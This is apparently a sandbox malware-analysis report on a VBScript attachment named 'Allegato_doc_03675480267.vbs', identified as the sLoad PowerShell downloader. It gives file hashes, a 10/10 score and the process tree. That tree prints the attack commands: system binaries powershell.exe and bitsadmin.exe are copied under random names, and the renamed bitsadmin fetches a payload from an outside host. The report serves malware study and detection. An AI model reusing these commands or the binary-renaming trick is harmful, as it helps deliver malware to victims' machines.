Analysis
-
max time kernel
30s -
max time network
113s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
14-09-2020 12:24
General
-
Target
Allegato_doc_03675480267.vbs
-
Size
4KB
-
MD5
a824af955b840327f2cf795b1b7fcabf
-
SHA1
a13ec743a3a4476339c7e521e57b431355a5c67e
-
SHA256
1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e
-
SHA512
acab55eed2f7468495758666d67e9593eb9e32f44da823b2b0ac7560d78f76b0f1dded255f8f51a68023e3881fc46b1b362b1fb8c47517f5179fe26d7b5cba92
Score
10/10
Malware Config
Signatures
-
sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
-
Executes dropped EXE 1 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_03675480267.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zWhZRIiim.exe2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\WhZRIiim.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\WhZRIiim.exe"C:\Users\Admin\AppData\Roaming\WhZRIiim.exe" /transfer szlqLE /download https://unequipoganador.com/ipol/03675480267/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
-